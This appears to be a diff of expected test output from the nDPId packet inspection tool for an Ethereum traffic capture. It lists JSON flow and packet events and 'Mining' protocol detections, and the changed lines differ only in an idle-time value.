01870{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1578508364631,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1099,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1099,"pkt_l4_len":1065,"thread_ts_msec":1578508364631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ9McxAACoRfjA056VswKgBuHZfdl8EKSMV0Tk6zLZQqYdPasDvQYAfjhJ8qeDK0iQF1oC6v4BIFO8Ukv4XviQf8O74kSNp590utu+\/aRkEwwpxoabIrzvIzmTnyJlNpeyfgvNPwLIyg8I+w4LWPa4MA\/W2\/Jap8zB7AAT5A7z5A7T4TYQS26efgnZfgnZfuEAwkgYgUPIi4WiJg+QLzg9wGMhxPAR7azw\/xSKBAPOQbQlR3L69+mdeoxh\/qQi76RfNXeauKXl5ICJHofVK35cH+E2EUt2AH4J2YIJ2YLhAIbpA\/cDFhpXtS\/hixQb3nA9r93xmFVARyWt8mvD62Q42RXQv9d4buwnSPqvoZ8VPM1tV452Mu7b1nW6WCZP3H\/hNhJBbeIeCdl+Cdl+4QHDcQogYDcUZvsmo9wM3ftVwQss5t6Xz7SYpcIe0QCLsJRPOe\/7IMshT7rIUH59Wvzm2VWBMciyHxs11tRtvlg74TYSyPgragnZfgnZfuECktuxNZlsAPCNrxc8drmg5UZJYYlgJcgwixi3dHcHaL+SmxYYPit8ZDD0AQGDBI97zkdb5Vg5h5AMJ3ltOege3+E2Esj4dt4J2X4J2X7hAbSf3keqm\/kX1w8mhO8tfUrHPkpEON98Bfi90NSvh60PrPxJjJwxphJtd9yYNAp6bvKKmXex+Pf1jNZwIZzl1LfhNhA3mbCqCdl+Cdl+4QOL5cPG1naCZem66zt1KAC6uDCfFoxJhecyNkCxirh\/KFEuDlQVcZ87QmYypugLnAbyvaDrG2A\/fgNNcBVjcu7P4TYS524U+gnZfgnZfuEAvzWrhvDjoXJOa\/ZdCbLgHiFuGktYvbPu1Kx0QfSszMjCe5P4b3hECkMlBLQo90CRjw1UcL0V+qQHcUkhH7ixE+E2ErGlePoJ2X4J2X7hAXGqY3uhYXKqMbPC9rcGcCUaWh+Dhi0uXFAXOGFtMr99hmG7UDnrqzTA\/o5MeRw5C1b8eG9l8GAevaeYZyFb6JfhNhLaioT2Cdl+Cdl+4QIU96ApVNnmCgofL7UIVwC0ussPQFE9BZpIkW9NYXxtm+4r+lcBEpjNfLr4w84vJM4LIgefP7wW0fAmtWWHpBj34TYRZo5RJgnklgnkluED1tj7tRebZlvZCTgHMIT8H0RpJXJ6gH+sJFUxXqZs38C\/hpzENTsCSDh1o2HUHvKg2FabU7+4S+HyXXU68T+Xi+E2EM01tNoLk1oLk1rhAfag2FjkUzZm46\/aJuVMW3oNNsPORtJDs86feqI9xjoUJ09giSja9nrnxBmA4a19j\/wmY0SxfQ5ijGeyrdMEjJvhNhCPk+oyCdl+Cdl+4QD9WPrST\/PNOA12+8bgX6kV4hJFBTbV9EgAQ6hcCTUo0f0CQNtNTkrUkC7hmmUaZ\/d9jh6CLjUr6pActojR+FlyEXhYgYA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364632,"flow_last_seen":1578508364632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1578508364632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364632,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGCOPAqAG4MyY8T901dl\/qiNMXAAAAALAC\/\/88YQAAAgQFtAEDAwUBAQgKItiUuAAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1578508364646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364646,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGQxWi86BTwKgBuHZf3SW77REO6nqus6AScSAW9gAAAgQFrAQCCAp1Z9P7ItiUTwEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1578508364646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364646,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGNR3AqAG4ovOgU90ldl\/qeq6zu+0RD4AQECymNwAAAQEICiLYlMZ1Z9P7"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364647,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1578508364647,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364632,"flow_last_seen":1578508364632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1578508364632,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364632,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGCOPAqAG4MyY8T901dl\/qiNMXAAAAALAC\/\/88YQAAAgQFtAEDAwUBAQgKItiUuAAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1578508364646,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364646,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGQxWi86BTwKgBuHZf3SW77REO6nqus6AScSAW9gAAAgQFrAQCCAp1Z9P7ItiUTwEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1578508364646,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364646,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGNR3AqAG4ovOgU90ldl\/qeq6zu+0RD4AQECymNwAAAQEICiLYlMZ1Z9P7"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364647,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":458,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1578508364647,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 01875{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1578508364649,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1099,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1099,"pkt_l4_len":1065,"thread_ts_msec":1578508364649,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ9Do1AACcR\/\/USimxDwKgBuHZfdl8EKXURHZU493PpfyH72WrYTKC\/rHcqyoxdJnlAGqx0IUPpfCDPrp1RbMe2PXXL\/Y0gUgYBHgBKX+LNKEC1qdxuKnvxvXevxKSr69S3rpBsxtD9oPpZta4nmfTh\/aybl9dDX7mZAQT5A7z5A7T4TYTKcBxqgnZfgnZfuECGOOF\/DUGQRmRtLD+gVTFTpr29WNtAkV6+wzvS1j2\/a652c2Up+3+CFGHvVHTbjE15jtDjeTNqp85aDPL\/y+3R+E2E1YVu74J6R4J6R7hACdquySb8h9bDyyzBVqIC4RVjIfrd43xNEhVl26cR8q+zCkRbVR7YOVOrP+cqMugQfvn+wj\/y\/7lEeLvwq\/902PhNhIpLq76Cdl+Cdl+4QPw+TE9tCaxzvKUZLrSUydGaIDt2Km6jvC1h7Hg9CIqQESMae7r6mkOxEncigdCNSYhdj\/fphc\/puhfvJzVEsBH4TYSd5phXgnZfgnZfuEBkLPllDdiGnUJSXb9oWAEuO01k9HXnM4R6tvd0I0GkOXQUhl2VOHTo9e2RsOThxTPe4UrR1rsnalRZskcUYP8N+E2EuRnM0YJv8YJv8bhAWtd39T3gGPqV5\/kAxth9r0Z21IwC3OO8ijNQxmi2ggVwJqg2W08zX0qhgUwFTxRZ7CbZwhQtBb9MNGyCEZnVqfhNhDOhFwyCdl+Cdl+4QK0vqa8HM5bIAwN2G4EpFPUp1DIN0fK8JdET2pxyCxTou65T7kwDQcRwG9J87PVp8UWu5zbalyVDTlzNuCAazd\/4TYQ0CYBEgnZfgnZfuEDgMt94d8TQv+3IGK5MVBJ+471CdMGgEuFgADFs\/sfR77hApAbinmLOWlg0KBI76fx3iPiGmIjPc2DjV6Y5S+dt+E2EI+XoE4J2X4J2X7hAIvfQZKlYQVCc0QQPwdirlpv8ThVD2qtJQ\/hHeZ\/oRum3Dym8iOrz0uJZ5KMKMAHJAax\/7cDcr+ygJhYzzSAsNPhNhBLbp5+Cdl+Cdl+4QDCSBiBQ8iLhaImD5AvOD3AYyHE8BHtrPD\/FIoEA85BtCVHcvr36Z16jGH+pCLvpF81d5q4peXkgIkeh9Urflwf4TYR82eu0gnZfgnZfuEBXvLisck0JGnGrgRqWL\/bDyJ8qsCwpUwM0sk3OmDN\/PU2NXINnOwgDzonj2zUWAZS5\/UZawhYcs8O8n12+UDva+E2EXN5bw4Jv8YJv8bhAmWLd+VP5u1ibBrgKagKp3py+njifftSzD32rmGG+J3QgFhiB28tAr4XUS33ESEXzhatHLB80xoRt5yzzOLxbKvhNhCPEd72CeRmCeRm4QEsv12Yq4nMYX4LQY5r9d7BNkGpNa1KOs2Gd6C4u3NZleL+d2v4Anfsu4uoql9o1Ksl2BdYCVg1KygwMa9DuSGuEXhYgYA=="} 01013{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1578508364650,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364650,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHFDo5AACcRAm0SimxDwKgBuHZfdl8BsYIGz0wiJjKaUzFXr6IJm0KhJJHh14UxEkvPcQ\/Rk7Fgvbo\/feZhAIkP1PMVdfnmkT0ej4RbRZLeGs4r7KmIG\/NoSRob2DIRR9KSxxR5ApQK0GtL+DiOoUZ+LI2SWe0lCUL6AQT5AUT5ATz4TYSnR61sglIIglIIuEB7ukp3Oj6MzbNl3nDN0jQiNpC1V5v5rn9Rt7ZEw1VBzFla5k6rBHcylJhBRGAYzBX+17ncBsVtgVPJrKMh7nvV+E2EEop59oKMoIKMoLhASS3OSNDf3z8b3OyL7l\/Hx\/k821PEzINQHbZfniqNPVksrwSkp6jrG6UYCpQoXvgKZOetorWlposBzYkgatgcWfhNhDP\/TVmCdl2Cdl24QM3iC4E\/jtROh\/yrXbgvFZypcqA1E0NM1pmVBNhPzAEVOKwUDY19JR7HzoFwywH46oqp8Nqzrz5YKF3TzRCEzqb4TYS57vnMglLcglLcuECRN7VxzSUAEA2k0pdpV6OAanNBmMgqxX6AGOkM+qhp9apzS9PVbGdlMMSUUvnshxBsN5liOIkWGjzwRsyI7kXrhF4WIGA="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364654,"flow_last_seen":1578508364654,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364654,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1578508364654,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364654,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHl8oAAEARbG\/AqAG4gAAzjHZfdl8AswwF15lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"} 00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364654,"flow_last_seen":1578508364654,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1578508364654,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"128.0.51.140","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1578508364657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364657,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC8GWDwD0S1PwKgBuHZf3TTdrvLSmxdVZqAScSC43wAAAgQFrAQCCApOlRAnItiUTwEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1578508364657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364657,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR0TAqAG4A9EtT900dl+bF1Vm3a7y04AQECxIFwAAAQEICiLYlNBOlRAn"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364659,"flow_last_seen":1578508364659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1578508364659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364659,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGv5TAqAG4KEOQgN02dl98bCWSAAAAALAC\/\/8OmwAAAgQFtAEDAwUBAQgKItiU0QAAAAAEAgAA"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":395,"flow_tot_l4_payload_len":395,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1578508364667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364667,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEG8jtCKlL2wKgBuHZf3SQj+YV4f2iiaKAScSArVwAAAgQFrAQCCAodkmB\/ItiUTwEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1578508364667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364667,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG40PAqAG4QipS9t0kdl9\/aKJoI\/mFeYAQECy6hgAAAQEICiLYlNgdkmB\/"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1578508364668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364668,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGF+czJjxPwKgBuHZf3TW8w0qY6ojTGKAScSDV+QAAAgQFrAQCCAphOp2qItiUuAEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1578508364668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364668,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGCO\/AqAG4MyY8T901dl\/qiNMYvMNKmYAQECxlkQAAAQEICiLYlNlhOp2q"} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":429,"flow_tot_l4_payload_len":429,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1578508364669,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364632,"flow_last_seen":1578508364670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":421,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1578508364670,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364682,"flow_last_seen":1578508364682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364682,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1578508364682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364682,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG833AqAG4MyZRtN04dl9aLQCVAAAAALAC\/\/+JqQAAAgQFtAEDAwUBAQgKItiU5gAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1578508364657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364657,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC8GWDwD0S1PwKgBuHZf3TTdrvLSmxdVZqAScSC43wAAAgQFrAQCCApOlRAnItiUTwEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1578508364657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364657,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR0TAqAG4A9EtT900dl+bF1Vm3a7y04AQECxIFwAAAQEICiLYlNBOlRAn"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364659,"flow_last_seen":1578508364659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1578508364659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364659,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGv5TAqAG4KEOQgN02dl98bCWSAAAAALAC\/\/8OmwAAAgQFtAEDAwUBAQgKItiU0QAAAAAEAgAA"} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":395,"flow_tot_l4_payload_len":395,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1578508364659,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1578508364667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364667,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEG8jtCKlL2wKgBuHZf3SQj+YV4f2iiaKAScSArVwAAAgQFrAQCCAodkmB\/ItiUTwEDAwc="} 